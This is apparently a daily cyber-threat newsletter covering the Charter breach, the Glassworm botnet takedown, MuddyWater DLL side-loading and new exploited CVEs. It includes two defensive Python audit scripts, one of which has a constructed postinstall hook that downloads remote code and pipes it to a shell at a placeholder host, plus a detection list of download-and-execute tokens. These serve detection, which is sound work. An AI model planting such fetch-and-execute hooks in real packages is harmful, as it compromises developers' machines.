The Lyceum: Cyber Intelligence Daily — May 27, 2026
The Big Picture
Today's theme is the slow-motion collapse of the boundary between "tools you trust" and "tools that betray you." ShinyHunters didn't hack Charter — they called Charter, and walked away with 42 million customer records. CrowdStrike spent the night dismantling a botnet that was living inside developer extensions and npm packages. Microsoft shipped an out-of-band SharePoint patch, and CISA put two more actively exploited bugs on the clock. The connective tissue: every story today is about a trust relationship that turned out to be a one-way street.
What Just Dropped
- CVE-2026-48172 — LiteSpeed cPanel Plugin: actively exploited, added to CISA KEV with a May 29 federal deadline. Allows arbitrary script execution with root privileges on shared hosting servers.
- CVE-2026-9082 — Drupal Core: actively exploited SQL injection enabling privilege escalation and RCE. KEV federal deadline expires today (May 27).
- CVE-2026-45659 — Microsoft SharePoint Server (Subscription Edition, 2019, 2016): patched out-of-band, CVSS 8.8, authenticated RCE via untrusted deserialization. Site Member permissions are enough.
- CVE-2025-34291 — Langflow: actively exploited, KEV deadline June 4. CVSS 8.8, origin validation error in CORS configuration.
- CVE-2026-34926 — Trend Micro Apex One (on-prem): actively exploited directory traversal, KEV deadline June 4.
- Glassworm botnet — Cross-platform developer-targeting malware delivered via OpenVSX extensions, npm, and Python packages; all four C2 channels (Solana blockchain, BitTorrent DHT, Google Calendar, plus a fourth) severed by CrowdStrike, Google, and Shadowserver on May 26.
- Megalodon supply chain attack — More than 5,500 GitHub repositories compromised via malicious commits in a six-hour window using stolen developer credentials.
Today's Stories
ShinyHunters Called Charter's Help Desk and Walked Out With 42 Million Records
If you're a Spectrum customer, your name, email, home address, phone number, and account details may be sitting in a criminal group's hands right now.
Charter Communications has confirmed a data breach after ShinyHunters threatened to leak stolen data unless a ransom is paid. The attack vector is the part that should make every security team uncomfortable: the attackers didn't crack any sophisticated code. They made a phone call. According to Komando's reporting, ShinyHunters used voice phishing to compromise an employee's Microsoft Entra account, then exported records directly from Charter's Salesforce database. The listing claims over 42 million records containing names, emails, addresses, phone numbers, account plan details, and customer support ticket data, per CyberInsider.
Charter's official position is that "no sensitive personal information or customer proprietary network information (CPNI) data was exfiltrated." That's a narrow legal claim. It can be technically accurate while still meaning your basic account data is now leak-market inventory.
What changes if the ransom deadline passes without payment: the 42-million-record dump becomes raw material for targeted phishing, SIM-swapping, and account takeover campaigns against Spectrum customers for months. The signal to watch is whether ShinyHunters publishes a sample — that's their pattern when negotiations stall. The deeper structural problem: voice phishing an employee into handing over cloud credentials bypasses every technical control most enterprises have invested in. The MFA fatigue era is giving way to the "talk your way past the help desk" era, and Charter just became this week's case study.
CrowdStrike Just Killed a Botnet That Was Living Inside Your Developer Tools
If you write software for a living, this one is about you specifically.
On May 26, CrowdStrike's Counter Adversary Operations team — working with Google and the Shadowserver Foundation — severed all four command-and-control channels of the Glassworm botnet simultaneously. Glassworm's operators had published trojanized VSCode extensions to the OpenVSX marketplace disguised as time trackers and code formatters, targeting not only VSCode but Cursor, Positron, Windsurf, and VSCodium. Compromised npm and Python packages introduced malicious code through postinstall hooks. More than 300 GitHub repositories were poisoned using stolen developer credentials, with malicious code force-pushed into default branches.
The infrastructure was designed to survive takedowns. CrowdStrike documents Glassworm using Solana blockchain transactions as an immutable dead-drop, BitTorrent's distributed hash table for configuration, and Google Calendar event titles as encoded C2 paths. The malware checks locale, language, and timezone at runtime and quietly exits if it detects a CIS country, a common tell for Russian-aligned criminal operations.
What changes if this takedown holds: it's the first major coordinated disruption of a developer-supply-chain botnet at this scale, and it sets a precedent for how this category of threat gets attacked. The signal to watch is whether the operators rebuild on a new infrastructure pattern or whether arrests follow. What failure looks like: the same operators surface in 60 days with a fresh extension marketplace campaign, and we learn that severing C2 without taking the humans behind it just buys defenders a quarter. Either way, if you installed any VSCode extension or npm/Python package from an unfamiliar source in the past year, audit your developer environment now: list the extensions actually installed, check the install-time hooks of the packages in your lockfiles, and rotate any GitHub, npm or PyPI tokens that lived on the machine, because stolen developer credentials are how the repository poisoning was carried out. The channels are dead. The infections are not.
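A starting point for that audit, as an added example rather than anything from CrowdStrike's writeup: the Python script below walks a directory for package.json manifests, reports every npm lifecycle hook that runs during install (the channel the trojanized packages used) with a higher severity when the hook shells out or evaluates code, and flags editor-extension manifests that activate on every startup. The suspicious-token list is a heuristic chosen for this example, and the three manifests it scans are constructed, placeholder URL included.

```python
"""Audit a tree of package.json manifests for install-time hooks.

Added example, not Glassworm's code or CrowdStrike's tooling. Reports
(1) npm lifecycle hooks that execute during `npm install`, scored higher when
the hook downloads or evaluates code, and (2) VS Code-style extension
manifests that activate on every editor start. Sample manifests are constructed.
"""
from __future__ import annotations

import json
import tempfile
from pathlib import Path

# npm runs these automatically during install; a trojanized package needs one.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic "download-and-execute" / inline-eval tokens (assumption: tune locally).
SUSPICIOUS_TOKENS = ("curl ", "wget ", "| sh", "| bash", "powershell",
                     "base64", "node -e", "eval(", "child_process")

# Activation events that mean "run whenever the editor opens".
BROAD_ACTIVATION = {"*", "onStartupFinished"}


def scan_manifest(path: Path) -> list[dict]:
    """Findings for one package.json; empty list if nothing stands out."""
    try:
        manifest = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return [{"package": str(path), "kind": "unreadable",
                 "severity": "review", "detail": "manifest could not be parsed"}]

    name = manifest.get("name", str(path))
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if not cmd:
            continue
        hits = [t for t in SUSPICIOUS_TOKENS if t in cmd]
        findings.append({"package": name, "kind": "install-hook",
                         "severity": "high" if hits else "review",
                         "detail": f"{hook}: {cmd}" + (f" (matched {hits})" if hits else "")})

    # engines.vscode marks an editor extension; "*" activation runs its code
    # on every start regardless of what the user does.
    if "vscode" in manifest.get("engines", {}):
        broad = BROAD_ACTIVATION & set(manifest.get("activationEvents", []))
        if broad:
            findings.append({"package": name, "kind": "extension-broad-activation",
                             "severity": "review",
                             "detail": f"publisher={manifest.get('publisher', '?')} "
                                       f"activates on {sorted(broad)}"})
    return findings


def scan_tree(root: Path) -> list[dict]:
    """Scan every package.json under root, node_modules included on purpose."""
    findings = []
    for manifest in sorted(Path(root).rglob("package.json")):
        findings.extend(scan_manifest(manifest))
    return findings


def build_sample_tree() -> Path:
    """Constructed samples: a clean library, a package with a hostile
    postinstall, and an extension that activates on every start."""
    root = Path(tempfile.mkdtemp(prefix="devaudit-"))
    samples = {
        "node_modules/clean-lib/package.json": {
            "name": "clean-lib", "version": "1.0.0",
            "scripts": {"test": "node test.js"}},
        "node_modules/time-tracker-utils/package.json": {
            "name": "time-tracker-utils", "version": "0.3.1",
            "scripts": {"postinstall": "node -e \"require('child_process')"
                                       ".exec('curl -s http://example.invalid/x | sh')\""}},
        "extensions/acme.code-formatter-1.0.0/package.json": {
            "name": "code-formatter", "publisher": "acme-dev",
            "engines": {"vscode": "^1.80.0"}, "activationEvents": ["*"],
            "main": "./out/extension.js"},
    }
    for rel, body in samples.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(json.dumps(body), encoding="utf-8")
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"[{f['severity']:6}] {f['kind']:28} {f['package']}: {f['detail']}")
```

Point `scan_tree` at a project checkout and at your editor's extensions directory; an install hook with no suspicious token is still listed as "review", because a plain-looking `node install.js` can hide the same behaviour one file deeper.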
Iran's MuddyWater Spent a Week Inside a South Korean Electronics Giant — And Nobody Noticed
The most dangerous intrusions aren't the loud ones. They're the ones where the attacker sits quietly for a week, reading everything.
The Iranian hacking group MuddyWater hit at least nine organizations across nine countries in Q1 2026, according to Broadcom's Symantec and Carbon Black Threat Hunter Team. Targets spanned industrial and electronics manufacturing, education, the public sector, financial services, and professional services. Among the victims: a major South Korean electronics manufacturer where attackers maintained access for a week in February 2026. Also affected were an international airport in the Middle East, Southeast Asian industrial manufacturers, and a Latin American financial-services provider.
The technique is worth understanding. MuddyWater relied heavily on DLL side-loading: legitimately signed Fortemedia and SentinelOne binaries were used to load malicious DLLs. In plain terms, the signed executable is genuine and untouched; the attackers drop it into a directory they control next to a DLL carrying the name it expects to load, and the Windows library search order hands the trusted process the attacker's code. An endpoint tool that keys on the signature of the host process sees a valid SentinelOne or Fortemedia signature and waves it through. The Hacker News also notes a separate Iran-linked exfiltration campaign affecting the U.S., Israel, Saudi Arabia, and Turkey between late March and early April 2026, with at least two U.S. victims also targeted by destructive operations including deletion of partitions and backups, infrastructure tied by Gambit Security to Iran's Ministry of Intelligence and Security (MOIS).
What changes if this pattern holds: signature-based EDR becomes structurally less useful against MuddyWater, and behavioral detection across legitimately-signed binaries becomes table stakes. The signal that tells you which way it's going: the next MuddyWater disclosure either names the abused-binary set as the same Fortemedia/SentinelOne pair, or it names new ones — and the speed at which they rotate determines whether vendors can keep up with allowlist hygiene at all.
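One way to turn that into a behavioural hunt, as an added example that is not from the Symantec report: the Python below scores image-load records for the side-loading pattern itself rather than for any particular file name: a DLL resolved from the host executable's own directory, a host running from a user-writable path, a signed host loading a DLL that is unsigned or signed by someone else, and a DLL name that belongs in System32. Records follow the field names of Sysmon Event ID 7 (Image loaded) plus one assumed enrichment field, ImageSigner, for the host process's own signer, which Sysmon does not put on that event. The three sample records, their paths and their signer names are constructed.

```python
"""Behavioural DLL side-loading check over constructed image-load records.

Added example, not from the Symantec/Carbon Black report. Record fields mirror
Sysmon Event ID 7 (Image, ImageLoaded, Signed, Signature, SignatureStatus);
ImageSigner is an assumed enrichment carrying the host process's signer.
"""
from __future__ import annotations

import json
import ntpath

# Directories a standard user can write to: a signed vendor binary executing
# from one of these is the first tell of a dropped side-loading pair.
USER_WRITABLE_HINTS = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\",
                       "\\downloads\\", "\\public\\")

# System DLL names frequently hijacked when found outside System32
# (well-known, non-exhaustive; extend from your own telemetry).
COMMON_SIDELOAD_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "userenv.dll",
                         "wtsapi32.dll", "dwmapi.dll", "uxtheme.dll", "profapi.dll"}

SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")


def _norm(p: str) -> str:
    return p.replace("/", "\\").lower()


def score_image_load(ev: dict) -> dict | None:
    """Alert dict for one record, or None when the load looks like normal search order."""
    exe, dll = _norm(ev["Image"]), _norm(ev["ImageLoaded"])

    # A DLL served from System32/SysWOW64 is the expected resolution; only a
    # DLL from the host's own directory can be a side-load candidate.
    if any(d in dll for d in SYSTEM_DIRS) or ntpath.dirname(dll) != ntpath.dirname(exe):
        return None
    reasons, score = ["DLL loaded from host executable's directory"], 1

    if any(h in exe for h in USER_WRITABLE_HINTS):
        reasons.append("host executable runs from a user-writable path")
        score += 2

    host_signer = (ev.get("ImageSigner") or "").lower()
    dll_signer = (ev.get("Signature") or "").lower()
    dll_signed_ok = bool(ev.get("Signed")) and ev.get("SignatureStatus") == "Valid"
    if host_signer and (not dll_signed_ok or dll_signer != host_signer):
        reasons.append(f"signed host ({host_signer}) loaded DLL signed by "
                       f"'{dll_signer or 'nobody'}'")
        score += 3

    if ntpath.basename(dll) in COMMON_SIDELOAD_NAMES:
        reasons.append("DLL name is a known side-loading target outside System32")
        score += 2

    if score < 3:
        return None
    return {"host": ev["Image"], "dll": ev["ImageLoaded"], "score": score,
            "severity": "high" if score >= 6 else "medium", "reasons": reasons}


def hunt(records: list[dict]) -> list[dict]:
    return [a for a in (score_image_load(r) for r in records) if a]


# Constructed sample records as JSON lines; signer names and paths are placeholders.
SAMPLE_LOG = r"""
{"Image": "C:\\Program Files\\ExampleAV\\agent.exe", "ImageSigner": "Example AV Corp", "ImageLoaded": "C:\\Program Files\\ExampleAV\\helper.dll", "Signed": true, "Signature": "Example AV Corp", "SignatureStatus": "Valid"}
{"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\agent.exe", "ImageSigner": "Example AV Corp", "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\version.dll", "Signed": false, "Signature": "", "SignatureStatus": "Unsigned"}
{"Image": "C:\\Windows\\System32\\svchost.exe", "ImageSigner": "Microsoft Windows", "ImageLoaded": "C:\\Windows\\System32\\version.dll", "Signed": true, "Signature": "Microsoft Windows", "SignatureStatus": "Valid"}
"""


def load_records(text: str) -> list[dict]:
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


if __name__ == "__main__":
    for alert in hunt(load_records(SAMPLE_LOG)):
        print(json.dumps(alert, indent=2))
```

Only the second record fires: same directory, user-writable path, unsigned DLL under a signed host, and a System32 name out of place. The first record (vendor binary loading its own signed helper from Program Files) scores below the threshold, which is the point: the rule keys on where and how the load happened, so it survives the operators rotating to a different signed binary.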
SharePoint Has a New RCE Flaw — Patch It Before Someone Else Does
SharePoint sits at the center of your organization's document universe — contracts, HR files, project plans. When it has a remote code execution flaw, it's not a theoretical problem.
Microsoft issued an out-of-band patch for CVE-2026-45659, a SharePoint RCE vulnerability with a CVSS score of 8.8. According to Help Net Security, the bug stems from deserialization of untrusted data, allowing an authenticated attacker with as little as Site Member permissions to execute code remotely on a vulnerable server. "Authenticated" is a lower bar than it sounds: a contractor, a temp, or a phished employee account fits the profile. It affects SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016.
Microsoft says exploitation is currently "less likely," and no public PoC exists yet.
What changes if a PoC drops: the window between disclosure and mass exploitation will be measured in hours, not days — SharePoint's history makes this near-certain eventually. Help Net Security notes deployments have been targeted by nation-state hackers, ransomware operators, and initial access brokers in the past. The signal that tells you which path this is on: watch for the first credible PoC on Exploit-DB or a security researcher's blog. The historical pattern is that "less likely to be exploited" SharePoint bugs become "actively exploited" SharePoint bugs roughly two to six weeks after disclosure. Patch now, especially if your SharePoint is internet-facing or accessible to external contractors.
⚡ What Most People Missed
- CISA put an actively exploited LiteSpeed plugin bug on the clock: CVE-2026-48172, CVSS 9.8, lets attackers execute arbitrary scripts with root privileges through the LiteSpeed user-end cPanel plugin. cPanel took the unusual step of removing the plugin entirely from all cPanel versions via a May 19 nightly update — the software equivalent of yanking a smoking appliance off the wall. If this moves from opportunistic scanning to coordinated mass deployment, shared-hosting providers will be force-patching tenants by the weekend.
- KnowledgeDeliver zero-day exploitation is no longer theoretical: Attackers exploited a critical zero-day in the Japanese learning management system to install Godzilla web shells on exposed servers, per BleepingComputer. LMS software lives in weird corners of enterprise networks — trusted enough to be neglected, internet-facing enough to be useful. Once a web shell lands on that kind of box, it stops being a learning platform and starts being a side entrance.
- GitLab suspended Nightmare-Eclipse, and the researcher set a date: Following GitHub's earlier termination, GitLab suspended the account behind six Windows zero-days released in six weeks. The researcher's public response includes a threat to release RCEs, a promised "big surprise" for the June 10 Patch Tuesday, and a dead man's switch dated July 14 — Bastille Day, which is presumably not a coincidence. MiniPlasma still has no official patch.
- Megalodon poisoned more than 5,500 GitHub repos in six hours: BleepingComputer initially reported 3,800 affected repositories; the count has since climbed past 5,500 via compromised maintainer credentials and automated commit injection. If GitHub responds by shipping mandatory commit-signing the way it did after Shai-Hulud, expect a forced credential rotation event across the major cloud providers.
- Project Zero's Pixel 10 zero-click chain is resurfacing on Hacker News with a structural critique that's bigger than the bug: Seth Jenkins and Jann Horn documented a complete zero-click root chain using CVE-2025-54957 in the Dolby Unified Decoder plus a Pixel VPU kernel driver flaw. The patches exist. The deeper point: every AI-powered media feature that silently parses incoming content is new zero-click attack surface, and roughly 42% of Android devices never receive security updates.
From the Foreign Press
Xakep: Microsoft patched two zero-days called UnDefend and RedSun in May
Russian-language security outlet Xakep published technical detail overnight on two zero-day vulnerabilities in Microsoft products, internally named UnDefend and RedSun, fixed in the May 2026 update cycle. The names have not yet surfaced in English-language security coverage. Both appear in the broader set of Nightmare-Eclipse exploits confirmed in real-world attacks tied to Russian-geolocated infrastructure, which makes the Xakep writeup notable: it's the most detailed public mapping of the exploit names to CVE assignments currently available. Western outlets will likely pick this up in the next 24-48 hours; until then, anyone hunting for these in their environment needs a translation tab open. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.
Xakep: A hacker is claiming to sell 340 million OnlyFans records
Xakep reports that a threat actor is advertising a database of 340 million OnlyFans user records on underground forums. The scale is implausible on its face — that's roughly twice OnlyFans' publicly stated user count — and the company has not confirmed any breach. But the listing is active, and if even a fraction of the claimed data is real, it represents a significant privacy exposure for a platform whose users have strong reasons to keep their membership private. Treat the volume claim with skepticism; treat the existence of something being shopped as worth tracking. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.
CERT-UA: UAC-0001 (APT28) is exploiting CVE-2026-21509 against Ukraine and EU targets
CERT-UA's "Danger Bulletin" CERT-UA#19542 documents that the cluster Ukraine tracks as UAC-0001 — known in the West as APT28 or Fancy Bear — is actively weaponizing CVE-2026-21509 against Ukrainian and EU targets. The advisory predates English-language reporting on this exact CVE-to-actor mapping by a meaningful margin, which is the recurring pattern with CERT-UA: Ukrainian defenders are operating with better real-time signal on GRU-linked operations than most NATO-aligned SOCs. If you have EU government, defense, or critical-infrastructure exposure, pull the IOCs from the advisory now, not after the Western echo arrives. Source: CERT-UA — Ukrainian. No English-language coverage confirmed at time of publication.
📅 What to Watch
- If Charter's ransom deadline passes without payment and ShinyHunters publishes the 42-million-record dump, the next wave of Spectrum-customer phishing won't look like phishing — it'll look like legitimately personalized account communications, because attackers will have the data to make them so.
- If federal agencies missed today's Drupal KEV deadline on CVE-2026-9082, CISA's emergency directive arrives within days, and the state and local government Drupal compromises that follow will surface in headlines weeks later as "unrelated" municipal ransomware incidents.
- If the Glassworm operators surface on new infrastructure within 60 days, the takedown was tactical theater; if they don't, it's the first real proof that severing a developer-supply-chain botnet's C2 can hold long enough to matter.
- If CERT-UA's new uncategorized phishing campaign — flagged yesterday against Ukrainian officials, critical infrastructure, and military personnel — receives a UAC designation in the next 48 hours, watch the IOC overlaps with known GRU clusters; the simultaneous targeting profile matches the pre-attribution phase of operations that later get formally tied to APT28 or Sandworm.
- If a credible PoC for CVE-2026-45659 (SharePoint RCE) appears before next Tuesday, expect ransomware affiliates to fold it into initial-access toolkits by mid-June — SharePoint's history is unforgiving.
- If the Nightmare-Eclipse July 14 deadline produces a working RCE drop rather than another LPE, the EDR signature lag will show up in incident response reports through August, and the Windows admin community will spend Bastille Day refreshing GitHub mirrors instead of celebrating anything.
The Closer
Today gave us a telecom giant undone by a phone call, a botnet using Google Calendar as a dead drop, and a disgruntled researcher counting down to Bastille Day in blog posts. Somewhere, a SharePoint admin is reading the patch notes and wondering whether "currently less likely to be exploited" is Microsoft's love language or its threat assessment.
Stay paranoid out there.
If this landed in your inbox and someone you know runs a SharePoint server, a Spectrum account, or a VSCode extension they downloaded last Tuesday — forward it. They'll thank you Friday.